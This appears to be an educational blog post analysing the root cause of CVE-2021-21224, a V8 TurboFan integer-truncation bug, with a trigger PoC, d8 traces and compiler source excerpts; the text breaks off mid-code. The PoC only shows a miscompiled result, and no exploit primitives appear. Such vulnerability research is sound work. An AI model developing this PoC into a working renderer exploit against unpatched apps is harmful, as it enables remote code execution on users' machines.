V8 CVE-2021-21224 Renderer RCE Root Cause Analysis

Initially, I didn’t know much about V8 exploitation; I was a web guy with an interest in V8, and it was my CTF teammate, ptr-yudai, who helped me craft the Discord exploit. Back then, understanding the root cause wasn’t always necessary: for some of the exploits used in the Electrovolt research, I relied on regression tests added with patches or on existing exploits from GitHub or blogs. From there, I would write primitives and exploit Electron internals as needed. The goal of the Electrovolt research was to exploit Electron apps running on older Chromium/V8 versions with plenty of known bugs, typically by taking a JIT bug, writing the exploit, and compromising the app, so I never had to understand the root cause of the issue 😂.

But for the video, and out of curiosity, I took a deeper look into V8’s TurboFan to understand the root cause of this bug and of similar issues that surfaced around the same time. I ended up with a good amount of notes, so I decided to write an educational root cause analysis, hoping it might be helpful for others.

Now, let’s look into CVE-2021-21224, which we used for the Discord RCE.

Original Report: Issue #40055451

Checkout: git checkout b24f7ea946d

Here’s a modified PoC for explanation purposes based on the original report. This function foo demonstrates the bug:

PoC:

```javascript
function foo(a) {
  let x = -1;
  if (a) {
    x = 0xFFFFFFFF;
  }
  let out = 0 - Math.max(0, x);
  return out;
}
console.log(foo(true));
console.log(foo(false));
for (var i = 0; i < 0x10000; ++i) {
  foo(false);
}
console.log(foo(true));
```

When running this with a vulnerable version of V8, we observe surprising results: the same foo(true) call produces different output before and after optimization:

```
> ./v8/out.gn/discord.debug/d8 discord.js --allow-natives-syntax
-4294967295
0
1
```

Let’s see what is happening.

Before TurboFan optimizes the function, the code executes as expected. With a set to true:

0 - Math.max(0, 0xFFFFFFFF) => 0 - 0xFFFFFFFF => -4294967295

With a set to false, x remains -1, so 0 is expected:

0 - Math.max(0, -1) => 0 - 0 => 0

However, here’s where things get interesting. After TurboFan optimizes the function, foo(true) produces a different result:

0 - Math.max(0, 0xFFFFFFFF) => 0 - SOME_X => 1

This implies that Math.max(0, 0xFFFFFFFF) unexpectedly returns -1 after optimization, leading to 0 - (-1) = 1.

This unexpected result suggests that the Math.max function, when optimized by TurboFan, fails to handle the 0xFFFFFFFF value correctly. Instead of returning 0xFFFFFFFF (the unsigned 32-bit maximum value, or 4294967295), the optimized code interprets it as -1. This happens because 0xFFFFFFFF is -1 in 32-bit two’s complement representation, meaning TurboFan is treating it as Signed32(Int32) instead of Unsigned32(UInt32).
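To double-check the arithmetic outside of V8, here is a small C++ sketch (not V8 code; the function names are hypothetical). CorrectResult follows JavaScript’s double semantics, while BuggyResult models the miscompiled path under the assumption, taken from the analysis above, that the 64-bit Math.max result is cut down to its low 32 bits and read back as a signed int32.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>

// JavaScript semantics: numbers are doubles, so 0xFFFFFFFF keeps its
// value 4294967295 through Math.max and the subtraction.
double CorrectResult(double x) {
  return 0.0 - std::max(0.0, x);
}

// Hypothetical model of the miscompiled code: Math.max is computed in
// 64 bits, but only the low 32 bits survive and are read as a signed int32.
// (uint32_t -> int32_t wraps modulo 2^32 since C++20 and on mainstream compilers.)
int32_t BuggyResult(int64_t x) {
  int64_t max = std::max<int64_t>(0, x);  // 0x00000000FFFFFFFF for x = 0xFFFFFFFF
  int32_t low = static_cast<int32_t>(static_cast<uint32_t>(max));  // -> -1
  return 0 - low;  // 0 - (-1) == 1
}
```

With x = 0xFFFFFFFF, CorrectResult gives -4294967295 while BuggyResult gives 1, which is exactly the pair of values printed by the PoC.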

Now let’s look at the patch.

Patch and description: Chromium Code Review #2817791, “[compiler] Fix bug in RepresentationChanger::GetWord32RepresentationFor. We have to respect the TypeCheckKind.”



Fig 1: Diff of src/compiler/representation-change.cc @ Node* RepresentationChanger::GetWord32RepresentationFor(

Without knowing anything about the variables, just checking the code before patch, RepresentationChanger::GetWord32RepresentationFor would truncate values from Int64 to Int32 whenever the output_rep was kWord64 and the output_type was either Signed32 (range -0x80000000 to 0x7FFFFFFF) or Unsigned32 (range 0x0 to 0xFFFFFFFF). This meant that, regardless of whether the integer was supposed to be signed or unsigned, the function simply reduced the 64-bit integer to a 32-bit representation.

This explains the unexpected behavior we observed with Math.max(0, 0xFFFF_FFFF) after optimization. When 0xFFFF_FFFF was truncated to Int32, it was interpreted as -1 due to two’s complement representation. As a result, Math.max(0, 0xFFFF_FFFF) returned -1 instead of 0xFFFFFFFF, causing the final calculation of 0 - (-1) to yield 1.

Now let’s see what is actually happening and what these variables are. As the bug happens in the TurboFan optimization phase, we need a good understanding of how it works. For that, I referred to the following resources:

- Bug Reports and RCA:

- Speculative Optimization:

- Introduction to Speculative Optimization in V8 - Ponyfoo

- Slide Deck on Speculative Optimization

- https://webkit.org/blog/10308/speculation-in-javascriptcore/: one of the most extensive blog posts on speculative compilers

- Introduction to TurboFan by DOAR-E

- Pwn2Own 2021 Exploit Analysis:

TurboFan Intro



A small intro to TurboFan: when a JavaScript snippet runs in V8, the process begins by generating an Abstract Syntax Tree (AST), which is then converted to bytecode and executed by the Ignition interpreter. While executing, Ignition also collects type information, called feedback. As a function runs repeatedly (often termed “becoming hot”), it signals to V8 that it may benefit from optimization.

This is where TurboFan comes into play. TurboFan receives the bytecode for this “hot” function, along with the type feedback (profiling information) from Ignition, to perform speculative optimization. Since JavaScript is dynamically typed (unlike statically typed languages such as C), TurboFan speculates on types for efficiency. For instance, in an expression like a + b, if a and b are likely int32, TurboFan may use an int32 addition instead of a computationally expensive floating-point or int64 addition. Type information tells the compiler which registers to use, which instructions to choose, and much more.

Unlike a C compiler, TurboFan can’t prove that a variable is exactly of type X, so it speculates on the type based on the feedback. If one of the values unexpectedly becomes a large number or changes to a different type (e.g., a string), the assumption breaks. In such cases, V8 detects the mismatch, “deoptimizes,” and switches back to the unoptimized bytecode.
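The speculate-then-deoptimize idea can be modeled in a few lines. This C++ sketch is purely illustrative and is not how TurboFan emits code: the fast path assumes both operands are int32 and reports a failed speculation when the sum no longer fits, and the caller then falls back to the generic double path, which plays the role of deoptimization. All names are hypothetical.

```cpp
#include <cassert>
#include <cstdint>
#include <limits>
#include <optional>

// "Optimized" path: speculates that a + b fits in an int32.
// std::nullopt signals that the speculation failed (a deopt).
std::optional<int32_t> SpeculativeInt32Add(int32_t a, int32_t b) {
  int64_t wide = static_cast<int64_t>(a) + b;  // cannot overflow in 64 bits
  if (wide < std::numeric_limits<int32_t>::min() ||
      wide > std::numeric_limits<int32_t>::max()) {
    return std::nullopt;  // overflow check failed: bail out
  }
  return static_cast<int32_t>(wide);
}

// Generic path: JavaScript numbers are doubles, so this is always correct.
double GenericAdd(double a, double b) { return a + b; }

// Tries the fast path first and "deoptimizes" to the generic path on failure.
double Add(int32_t a, int32_t b, bool* deopted) {
  if (std::optional<int32_t> fast = SpeculativeInt32Add(a, b)) {
    *deopted = false;
    return *fast;
  }
  *deopted = true;
  return GenericAdd(a, b);
}
```

For example, Add(2147483647, 1, &d) returns 2147483648 with d set to true, because the int32 fast path overflowed and the generic path produced the correct value.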

Fig 2: Difference between C and JavaScript @ source



TurboFan goes beyond speculative compilation by applying multiple optimizations to improve JavaScript execution: it eliminates dead code, folds constants, inlines small functions to reduce call overhead, removes redundant operations, and much more to make the code faster.

Fig 3: Source: A Tale of TurboFan by Benedikt Meurer

For a deeper understanding, read the blogs above; for this post, this intro is good enough to dig into the bug and do the root cause analysis.

The Root Cause Analysis

discord.js

```javascript
function foos(a) {
  let x = -1;
  if (a) {
    x = 0xFFFFFFFF;
  }
  let out = 0 - Math.max(0, x);
  return out;
}
console.log(foos(true));
%PrepareFunctionForOptimization(foos);
console.log(foos(false));
%OptimizeFunctionOnNextCall(foos);
console.log(foos(true));
```

Execute the code above and open the generated turbo-foos-0.json file in Turbolizer, a nice tool for visualizing the various phases TurboFan goes through while optimizing bytecode.

d8 discord.js --allow-natives-syntax --trace-representation --trace-turbo



Graph Builder phase



In the first phase of TurboFan, the graph is built for the foos function from its bytecode, as shown in Fig 4. In Fig 5, the JSCall node (#36) refers to the Math.max call, and SpeculativeSafeIntegerSubtract (#41) represents subtracting the JSCall output from NumberConstant[0] (#22).

Fig 4: foos function bytecode

Fig 5: Turbofan 1st phase

Inlining Phase



Next, during the Inlining phase, the Math.max JSCall is transformed into a NumberMax node. Inside the ReduceMathMinMax function, a new SpeculativeToNumber node is inserted in front of each input (#21 and #54) of the NumberMax node. Nothing else interesting happens here; the JSCall is converted to NumberMax so that later optimization phases can replace the Math.max call with plain machine instructions instead of an actual function call.

src/compiler/js-call-reducer.cc

```cpp
case Builtin::kMathMax:
  return ReduceMathMinMax(node, simplified()->NumberMax(),
                          jsgraph()->ConstantNoHole(-V8_INFINITY));
```
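The -V8_INFINITY argument is the identity element for max: Math.max() with no arguments returns -Infinity, and folding each argument into it gives the result. A rough C++ model of the JavaScript semantics that NumberMax has to preserve (NaN propagates, and +0 wins over -0) might look like the following; the names are hypothetical and this is not V8’s implementation.

```cpp
#include <cassert>
#include <cmath>
#include <limits>
#include <vector>

// Hypothetical model of a single NumberMax node on doubles.
double NumberMaxModel(double lhs, double rhs) {
  if (std::isnan(lhs) || std::isnan(rhs)) {
    return std::numeric_limits<double>::quiet_NaN();  // NaN propagates
  }
  if (lhs == 0 && rhs == 0) {
    // +0 and -0 compare equal, but Math.max prefers +0.
    return std::signbit(lhs) ? rhs : lhs;
  }
  return lhs > rhs ? lhs : rhs;
}

// Math.max(...args) as a left fold starting from the identity -Infinity.
double MathMaxModel(const std::vector<double>& args) {
  double result = -std::numeric_limits<double>::infinity();
  for (double arg : args) result = NumberMaxModel(result, arg);
  return result;
}
```

Here MathMaxModel({0.0, 4294967295.0}) is 4294967295, the value the optimized code should produce for foos(true).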

Fig 6: Inlining phase



Typer Phase:

In the Typer phase, each node is assigned a type, with a range that defines the possible values the node can hold. This range helps V8 reason about the node’s type more accurately. For instance, a NumberConstant node for -1 has the range (-1, -1), meaning its exact value is -1, which fits in an int32. The variable x in our function is typed as a Phi node (a union) of two values: the range (-1, -1) of node #14 and the range (0xFFFFFFFF, 0xFFFFFFFF) of node #20. So the input to NumberMax takes the union of these ranges, resulting in (-1, 0xFFFFFFFF).

Notice that the NumberMax node is assigned the range (0, 0xFFFFFFFF), as this is the only range that can result from the Math.max computation. Since Math.max(0, -1) and Math.max(0, 0xFFFFFFFF) only produce values within this range, it accurately reflects the possible output of the Math.max operation. So far so good; let’s move on to the next phase.
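Both typing rules above are plain interval arithmetic. The following C++ sketch uses a hypothetical Range struct (V8’s real Type class is much richer) to reproduce the Phi union and the NumberMax bounds from the Typer phase; NumberMaxRange takes the maximum of the lower bounds and of the upper bounds, mirroring the min/max computation in op_typer_.NumberMax shown later in the Retype phase.

```cpp
#include <algorithm>
#include <cassert>

// Hypothetical, simplified stand-in for a V8 range type: [min, max].
struct Range {
  double min;
  double max;
};

// Phi: the value may come from either input, so take the hull of both.
Range UnionRange(Range a, Range b) {
  return {std::min(a.min, b.min), std::max(a.max, b.max)};
}

// NumberMax: the result is at least the larger lower bound and at most
// the larger upper bound.
Range NumberMaxRange(Range a, Range b) {
  assert(a.min <= a.max && b.min <= b.max);
  return {std::max(a.min, b.min), std::max(a.max, b.max)};
}
```

Feeding in the constants from the PoC, UnionRange({-1, -1}, {0xFFFFFFFF, 0xFFFFFFFF}) gives (-1, 0xFFFFFFFF) for x, and NumberMaxRange({0, 0}, x) gives (0, 0xFFFFFFFF), matching the types in Fig 7.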

Fig 7: Typer phase



Typed Lowering

In the Typed Lowering phase, the SpeculativeToNumber nodes #55 and #54 are removed because their inputs are already typed as numbers (for example, NumberConstant nodes are guaranteed to remain NumberConstant), which simplifies the graph as shown below. Beyond this, nothing particularly interesting or relevant to our focus happens in this phase.

Fig 8: Typed lowering phase

Simplified Lowering Phase

In the Simplified Lowering phase, TurboFan lowers high-level operations by selecting the best machine-level representations and instructions. For example, SpeculativeSafeIntegerSubtract is replaced below with the machine-level instruction Int32Sub.

Simplified lowering has three main steps; Faraz has a pretty good blog post on this phase, written as part of the RCA of a bug. You can add the --trace-representation command-line argument to see a trace of what happens during simplified lowering. Let’s see how the final graph below, after simplified lowering, is created.





Fig 9: Simplified Lowering

Step 1: Propagate phase

In the PROPAGATE phase, TurboFan traverses the graph from outputs to inputs (bottom to top), determining the ideal machine representation for each node and its inputs based on how they are used. Let’s say the traversal is at node #41, SpeculativeSafeIntegerSubtract (the node relevant to our bug).

It enters the switch case at [1] in the code below and calls VisitSpeculativeIntegerAdditiveOp with the node and the default truncation value Truncation::None(); lowering is false in the propagate phase. (I will explain what truncation is below.)

src/compiler/simplified-lowering.cc

```cpp
template <Phase T>
void VisitNode(Node* node, Truncation truncation,
               SimplifiedLowering* lowering) {
  tick_counter_->TickAndMaybeEnterSafepoint();

  if (lower<T>()) {
  [...]

  [...]
    case IrOpcode::kSpeculativeSafeIntegerAdd:
    case IrOpcode::kSpeculativeSafeIntegerSubtract:  // [1]
      return VisitSpeculativeIntegerAdditiveOp<T>(node, truncation, lowering);
      // visit #41: SpeculativeSafeIntegerSubtract (trunc: no-truncation (but distinguish zeros))
```

Then, inside VisitSpeculativeIntegerAdditiveOp, TurboFan uses the kSignedSmall hint [1] for SpeculativeSafeIntegerSubtract; technically our PoC doesn’t produce kSignedSmall values, but that is what it speculates. From this kSignedSmall hint, a UseInfo [4] object is created for each operand of the subtraction [2][3]. The UseInfo class describes how an input of a node is used (UseInfo == how the node is used). During this phase, the usage information for a node determines the best possible lowering for each operator so far, which in turn determines the output representation of each node.

So here, the left and right operands are used by SpeculativeSafeIntegerSubtract as kWord32 with a kSignedSmall type check [2][3]. The following calls in the propagate phase are not relevant to our bug. Importantly, the restriction of the current node at [0] is set to Type::Signed32() in our case, which means the node is restricted to the Signed32 range only.

```cpp
template <Phase T>
void VisitSpeculativeIntegerAdditiveOp(Node* node, Truncation truncation,
                                       SimplifiedLowering* lowering) {
  [...]
  // Try to use type feedback.
  Type const restriction =
      truncation.IsUsedAsWord32()
          ? Type::Any()
          : (truncation.identify_zeros() == kIdentifyZeros)
                ? Type::Signed32OrMinusZero()
                : Type::Signed32();  // [0]

  NumberOperationHint const hint = NumberOperationHint::kSignedSmall;  // [1]
  DCHECK_EQ(hint, NumberOperationHintOf(node->op()));
  [...]
  UseInfo left_use =
      CheckedUseInfoAsWord32FromHint(hint, left_identify_zeros);  // [2]
  // For CheckedInt32Add and CheckedInt32Sub, we don't need to do
  // a minus zero check for the right hand side, since we already
  // know that the left hand side is a proper Signed32 value,
  // potentially guarded by a check.
  TRACE("[checked] We are second here %s", node->op()->mnemonic());
  // UseInfo(MachineRepresentation::kWord32, Truncation::Any(identify_zeros), TypeCheckKind::kSignedSmall, feedback);
  UseInfo right_use = CheckedUseInfoAsWord32FromHint(hint, kIdentifyZeros);  // [3]
  VisitBinop<T>(node, left_use, right_use, MachineRepresentation::kWord32,
                restriction);
}

// src/compiler/use-info.h
class UseInfo {  // [4]
 public:
  UseInfo(MachineRepresentation representation, Truncation truncation,
          TypeCheckKind type_check = TypeCheckKind::kNone,
          const FeedbackSource& feedback = FeedbackSource())
      : representation_(representation),
        truncation_(truncation),
        type_check_(type_check),
        feedback_(feedback) {}
  // [...]
};
```

As the name implies, this phase also propagates “truncation” information, stored in the UseInfo, to the upper nodes while traversing. Here, “truncation” specifies which part of the input is actually used at that node. For example, when the propagate phase visits a Branch node (#16), it truncates its input (#15 below) to bool, since Branch expects a boolean value. For bitwise operators like OR (#25), the inputs (#21 and #2) are truncated to word32. Usually, a conversion node such as TruncateInt64ToInt32, which simply discards the higher bits, is then inserted between the input and the OR operation.

Output from --trace-representation for the statement return x | a:

```
--{Propagate phase}--
visit #25: SpeculativeNumberBitwiseOr (trunc: no-truncation (but distinguish zeros))  // OR | node
  initial #21: truncate-to-word32  // x
  initial #2: truncate-to-word32   // a
  [...]
visit #16: Branch (trunc: no-value-use)
  initial #15: truncate-to-bool
```
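Why is dropping the upper bits acceptable for x | a? Bitwise operators apply ECMAScript’s ToInt32 to their operands, which only keeps the value modulo 2^32, so a truncate-to-word32 use cannot observe the discarded bits. The C++ sketch below implements ToInt32 as the spec describes it (the function name is ours). Note that it maps 0xFFFFFFFF to -1: correct for a bitwise OR, but wrong for an arithmetic use like our subtraction, which needs the full value.

```cpp
#include <cassert>
#include <cmath>
#include <cstdint>

// ECMAScript ToInt32: all that a "truncate-to-word32" use may observe.
int32_t ToInt32(double value) {
  if (!std::isfinite(value)) return 0;             // NaN, +/-Infinity -> 0
  double truncated = std::trunc(value);            // round toward zero
  double modulo = std::fmod(truncated, 4294967296.0);  // remainder mod 2^32, keeps sign
  if (modulo < 0) modulo += 4294967296.0;          // now in [0, 2^32)
  uint32_t bits = static_cast<uint32_t>(modulo);
  // Reinterpret the 32-bit pattern as two's complement
  // (well-defined since C++20, and on mainstream compilers before that).
  return static_cast<int32_t>(bits);
}
```

For instance, ToInt32(4294967296.0 + 5) is 5 and ToInt32(4294967295.0) is -1: the upper bits are gone, which is harmless only when the consumer is a word32 operation.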

For our PoC, the propagate phase produces the following trace. Notice that the inputs of SpeculativeSafeIntegerSubtract and NumberMax don’t have any truncation, reflecting our analysis above.

```
--{Propagate phase}--
visit #42: Return (trunc: no-value-use)
  initial #22: truncate-to-word32
  initial #41: no-truncation (but distinguish zeros)
  initial #41: no-truncation (but distinguish zeros)
  initial #18: no-value-use
visit #41: SpeculativeSafeIntegerSubtract (trunc: no-truncation (but distinguish zeros))
  initial #22: no-truncation (but distinguish zeros)
  initial #56: no-truncation (but identify zeros)
  initial #52: no-value-use
  initial #18: no-value-Use
  [...]
visit #56: NumberMax (trunc: no-truncation (but identify zeros))
  initial #22: no-truncation (but distinguish zeros)
  initial #21: no-truncation (but distinguish zeros)
```

Step 2: Retype phase

Then, in RETYPE, the type information of every node is updated [1] based on the feedback types computed from its inputs, allowing more refined type assumptions as TurboFan continues to lower nodes.

```cpp
bool RetypeNode(Node* node) {
  NodeInfo* info = GetInfo(node);
  info->set_visited();
  bool updated = UpdateFeedbackType(node);  // [1]
  TRACE(" visit #%d: %s\n", node->id(), node->op()->mnemonic());
  VisitNode<RETYPE>(node, info->truncation(), nullptr);  // [2]
  TRACE("  ==> output %s\n", MachineReprToString(info->representation()));
  return updated;
}
```

Let’s see how the type information is updated for each of our important nodes.

```cpp
bool UpdateFeedbackType(Node* node) {
  [...]
  NodeInfo* info = GetInfo(node);
  Type type = info->feedback_type();
  Type new_type = NodeProperties::GetType(node);

  Type input0_type;
  if (node->InputCount() > 0) input0_type = FeedbackTypeOf(node->InputAt(0));  // GetInfo(node)->feedback_type();
  Type input1_type;
  if (node->InputCount() > 1) input1_type = FeedbackTypeOf(node->InputAt(1));

  switch (node->opcode()) {
    // The speculative binop cases are generated by a macro
    // (case IrOpcode::k##Name: {...}); one expansion is shown here.
    case IrOpcode::kSpeculativeNumberSubtract: {
      new_type = Type::Intersect(
          op_typer_.SpeculativeNumberSubtract(input0_type, input1_type),
          info->restriction_type(), graph_zone());  // [5]
      break;
    }
    case IrOpcode::kNumberMax: {
      new_type = op_typer_.NumberMax(input0_type, input1_type);  // [4]
      break;
    }
    case IrOpcode::kPhi: {
      new_type = TypePhi(node);
      if (!type.IsInvalid()) {
        new_type = Weaken(node, type, new_type);
      }
      break;
    }
    [...]
  }
  new_type = Type::Intersect(GetUpperBound(node), new_type, graph_zone());
  if (!type.IsInvalid() && new_type.Is(type)) return false;
  GetInfo(node)->set_feedback_type(new_type);  // node->feedback_type_ = new_type [2]
  if (v8_flags.trace_representation) {
    PrintNodeFeedbackType(node);
  }
  return true;
}

Type TypePhi(Node* node) {
  int arity = node->op()->ValueInputCount();
  Type type = FeedbackTypeOf(node->InputAt(0));
  for (int i = 1; i < arity; ++i) {
    type = op_typer_.Merge(type, FeedbackTypeOf(node->InputAt(i)));  // [1]
  }
  return type;
}

MachineRepresentation GetOutputInfoForPhi(Type type, Truncation use) {
  // Compute the representat[...]
  } else if (type.Is(Type::Number())) {
    return MachineRepresentation::kFloat64;  // [3]
  }
```

- Node #21 (Phi): looking at the code above, the new_type of the Phi node (the range of variable x in the PoC), which becomes its feedback_type [2], is set to Merge(input0, input1) [1], i.e. the union of its inputs:
  - input0 = Range(-1, -1) #14
  - input1 = Range(0xFFFF_FFFF, 0xFFFF_FFFF) #20
  - node->feedback_type_ = Merge(input0, input1) = Range(-1, 0xFFFFFFFF)
- In the Retype phase log output below, the static type of #21 is this merged range.
- After this, the VisitNode call in RetypeNode [2] sets the node’s output representation (node->info->representation()) to kRepFloat64, because the type falls in the Number range [3].
- Node #52 (NumberMax): its feedback_type is updated [4] by calling op_typer_.NumberMax(), which essentially takes the maximum of each bound of the input ranges:
  - input0 = Range(0, 0) #22
  - input1 = Range(-1, 0xFFFF_FFFF) #21
  - node->feedback_type_ = Range(0, 0xFFFF_FFFF), computed as: double min = std::max(lhs.Min(), rhs.Min()); double max = std::max(lhs.Max(), rhs.Max()); type = Type::Union(type, Type::Range(min, max, zone()), zone());
  - In the trace below, the output representation of #52 (node->info->representation()) is set to kRepWord64 given its final range.
- Node #41: interestingly, the new_type of SpeculativeSafeIntegerSubtract [5] is the intersection of the type computed from the input0 and input1 operand types and the restriction_type (Signed32) from the propagate phase:
  - input0 = Range(0, 0) #22
  - input1 = Range(0, 0xFFFF_FFFF) #52 (NumberMax)
  - node->feedback_type_ = Intersect(OperationTyper::SpeculativeNumberSubtract(input0, input1) => Range(-4294967295, 0), restriction_type = Signed32 (-0x8000_0000, 0x7FFF_FFFF)) = Range(-2147483648, 0)
  - Notice that the static type overflows the Signed32 range, while the feedback_type is restricted to Signed32.

Finally, in the trace, the output representation of #41 is set to kRepWord32.
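The feedback type of #41 can be reproduced with the same interval arithmetic. In this sketch, Range is again a hypothetical stand-in for V8’s Type (minus zero and NaN are ignored): subtracting intervals pairs the left lower bound with the right upper bound, and intersecting with the Signed32 restriction clamps the result to [-2^31, 2^31 - 1].

```cpp
#include <algorithm>
#include <cassert>

// Hypothetical, simplified stand-in for a V8 range type: [min, max].
struct Range {
  double min;
  double max;
};

// Interval subtraction: [a.min - b.max, a.max - b.min].
Range SubtractRange(Range a, Range b) {
  return {a.min - b.max, a.max - b.min};
}

// Interval intersection; assumes the two ranges overlap.
Range IntersectRange(Range a, Range b) {
  Range r{std::max(a.min, b.min), std::min(a.max, b.max)};
  assert(r.min <= r.max);
  return r;
}

// The Signed32 restriction_type computed in the propagate phase for #41.
const Range kSigned32{-2147483648.0, 2147483647.0};
```

SubtractRange({0, 0}, {0, 0xFFFFFFFF}) yields the static type (-4294967295, 0), and intersecting it with kSigned32 yields the feedback type (-2147483648, 0) seen in the trace.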

If you look closely, the output representation is set to kRepWord32. Doesn’t this mean the subtraction operates only on the lower 32 bits? Yep, that’s correct: the subtraction takes place within the 32-bit range (kRepWord32). However, TurboFan guards this 32-bit speculation with checks, and if it detects overflow or precision loss during execution (which happens in the PoC), it triggers a bailout and deoptimizes, switching to a more accurate, non-optimized execution path. If we run our code with a patched d8, the deoptimization takes place as shown below, but it does not happen with our vulnerable d8:

```
> ./v8/out.gn/arm64.debug/d8 discord.js --allow-natives-syntax --trace-deopt --trace-opt
-4294967295
0
[manually marking 0x1472000491c5 <JSFunction foos (sfi = 0x1472002992e1)> for optimization to TURBOFAN_JS, ConcurrencyMode::kSynchronous]
[compiling method 0x1472000491c5 <JSFunction foos (sfi = 0x1472002992e1)> (target TURBOFAN_JS), mode: ConcurrencyMode::kSynchronous]
[completed compiling 0x1472000491c5 <JSFunction foos (sfi = 0x1472002992e1)> (target TURBOFAN_JS) - took 0.125, 10.333, 0.625 ms]
[bailout (kind: deopt-eager, reason: lost precision): begin. deoptimizing 0x1472000491c5 <JSFunction foos (sfi = 0x1472002992e1)>, 0x112b000402cd, opt id 0, node id 97, bytecode offset 12, deopt exit 0, FP to SP delta 32, caller SP 0x00016b074ee0, pc 0x00016d340244]
-4294967295
```

```
--{Retype phase}--
#21:Phi[kRepTagged](#14:NumberConstant, #20:NumberConstant, #18:Merge) [Static type: Range(-1, 4294967295)]  // variable x
 visit #21: Phi
  ==> output kRepFloat64
#52:NumberMax(#22:NumberConstant, #21:Phi) [Static type: Range(0, 4294967295)]  // Math.max
 visit #52: NumberMax
  ==> output kRepWord64
#41:SpeculativeSafeIntegerSubtract[SignedSmall](#22:NumberConstant, #52:NumberMax, #23:Checkpoint, #18:Merge) [Static type: Range(-4294967295, 0), Feedback type: Range(-2147483648, 0)]
 visit #41: SpeculativeSafeIntegerSubtract
  ==> output kRepWord32
```

So far so good: nothing is wrong with the TurboFan optimization yet. Let’s check the final step of simplified lowering.



Step 3: Lower phase

Finally, in LOWER, each node is transformed into lower-level, machine-specific nodes, with some nodes replaced, expanded, or removed as redundant. The RepresentationChanger (src/compiler/representation-change.cc) inserts any conversions needed so that each value uses the appropriate machine-level representation, completing the optimization. Let’s see how our nodes from the previous Typed Lowering phase get updated. Fig 9 below is the unpatched version and Fig 10 is the patched version.

Notice that NumberConstant nodes #68 and #67 are lowered to Float64Constant because the machine representation of #21 was set to kRepFloat64 in the previous phase.

NumberMax is completely removed and replaced with Int64LessThan and Select[kRepWord64]. Importantly, notice that both the LessThan and the Select are 64-bit, which makes sense because the output representation of #52:NumberMax is kRepWord64, so the lower-level instructions are chosen accordingly. This can be traced in the code.

- Math.max can be done this way

- condition = Int64LessThan(a, b)

- // If ‘condition’ is true (a < b), Select chooses ‘b’. // If ‘condition’ is false (a >= b), Select chooses ‘a’.

- result = Select(condition, b, a);
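The Int64LessThan + Select pair is a branch-free maximum over 64-bit integers. Rendering the same two operations in C++ (the function name is hypothetical) shows that the lowered Math.max itself is fine: on the 64-bit path, max(0, 0xFFFFFFFF) is still 0x00000000FFFFFFFF.

```cpp
#include <cassert>
#include <cstdint>

// Mirrors Int64LessThan followed by Select[kRepWord64]:
// condition = a < b; result = condition ? b : a.
int64_t SelectMax64(int64_t a, int64_t b) {
  bool condition = a < b;    // Int64LessThan(a, b)
  return condition ? b : a;  // Select(condition, b, a)
}
```

Because both operands stay in 64 bits, SelectMax64(0, 0xFFFFFFFF) returns 4294967295; the damage only happens once this value is narrowed to 32 bits.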

So far so good and it matches the patched version too.

The interesting part is that, in the unpatched version, the output of #56:Select is passed to #72:TruncateInt64ToInt32, while in the patched version it’s passed to #72:CheckedUint64ToInt32. This is critical because TruncateInt64ToInt32 discards the upper 32 bits, whereas CheckedUint64ToInt32 performs an overflow check to prevent data loss. This vulnerable node let the optimized Math.max produce 0x0000_0000_FFFF_FFFF (Int64) and have it interpreted as -1 (Int32, the two’s complement interpretation of 0xFFFFFFFF). We have identified the exact node that causes the bug; let’s dive into the code to see what went wrong.

Also notice that in the patched version the Int32Sub has the correct range for an Int32 subtraction, while the unpatched version has an incorrect one. It seems the feedback_type is not propagated to the actual type via NodeProperties::SetType (I couldn’t debug this with source code on my shitty Apple Silicon Mac d8 build).
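The difference between the two conversion nodes can be sketched in C++. This is a model under stated assumptions, not V8’s implementation: the names are hypothetical, std::nullopt stands in for a deopt (like the “lost precision” bailout in the patched trace earlier), and Int32SubModel assumes a plain 32-bit subtraction that wraps, with no check of its own.

```cpp
#include <cassert>
#include <cstdint>
#include <limits>
#include <optional>

// Model of TruncateInt64ToInt32: keep the low 32 bits, no check.
// (uint32_t -> int32_t wraps modulo 2^32 since C++20 and on mainstream compilers.)
int32_t TruncateToInt32(int64_t value) {
  return static_cast<int32_t>(static_cast<uint32_t>(value));
}

// Model of CheckedUint64ToInt32: deopt (std::nullopt) when the unsigned
// value does not fit in a signed 32-bit integer.
std::optional<int32_t> CheckedUint64ToInt32Model(uint64_t value) {
  if (value > static_cast<uint64_t>(std::numeric_limits<int32_t>::max())) {
    return std::nullopt;
  }
  return static_cast<int32_t>(value);
}

// Model of Int32Sub: a plain 32-bit subtraction that wraps on overflow.
int32_t Int32SubModel(int32_t lhs, int32_t rhs) {
  return static_cast<int32_t>(static_cast<uint32_t>(lhs) -
                              static_cast<uint32_t>(rhs));
}

// `0 - Math.max(0, x)` with the unpatched conversion.
int32_t VulnerableFoo(int64_t max_result) {
  return Int32SubModel(0, TruncateToInt32(max_result));
}

// `0 - Math.max(0, x)` with the patched conversion; std::nullopt means "deopt".
std::optional<int32_t> PatchedFoo(int64_t max_result) {
  std::optional<int32_t> rhs =
      CheckedUint64ToInt32Model(static_cast<uint64_t>(max_result));
  if (!rhs) return std::nullopt;
  return Int32SubModel(0, *rhs);
}
```

With 0xFFFFFFFF as the Math.max result, VulnerableFoo returns 1, matching the PoC output, while PatchedFoo bails out so the unoptimized code can compute -4294967295.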

Fig 9 Unpatched: Simplified Lowering

Fig 10 Patched: Simplified Lowering

The output of the Lower phase:

```
--{Lower phase}--
 visit #52: NumberMax
  change: #52:NumberMax(@0 #22:NumberConstant) from kRepTaggedSigned to kRepWord64:no-truncation (but distinguish zeros)
  change: #52:NumberMax(@1 #21:Phi) from kRepFloat64 to kRepWord64:no-truncation (but distinguish zeros)
 visit #41: SpeculativeSafeIntegerSubtract
  change: #41:SpeculativeSafeIntegerSubtract(@0 #22:NumberConstant) from kRepTaggedSigned to kRepWord32:no-truncation (but distinguish zeros)
  change: #41:SpeculativeSafeIntegerSubtract(@1 #52:Select) from kRepWord64 to kRepWord32:no-truncation (but identify zeros)
 visit #42: Return
  change: #42:Return(@0 #22:NumberConstant) from kRepTaggedSigned to kRepWord32:truncate-to-word32
  change: #42:Return(@1 #41:Int32Sub) from kRepWord32 to kRepTagged:no-truncation (but distinguish zeros)
 visit #43: End
```

Lowering Phase Source Code Flow

VisitNode enters the switch case for #41:SpeculativeSafeIntegerSubtract [1], just like in the previous Retype phase. The left and right operands of SpeculativeSafeIntegerSubtract are used with a UseInfo of kWord32 and a kSignedSmall type check [3][4]. Inside VisitBinop, the left and right operand UseInfos are passed to ProcessInput separately [5][6].

```cpp
// visit #41: SpeculativeSafeIntegerSubtract
template <Phase T>
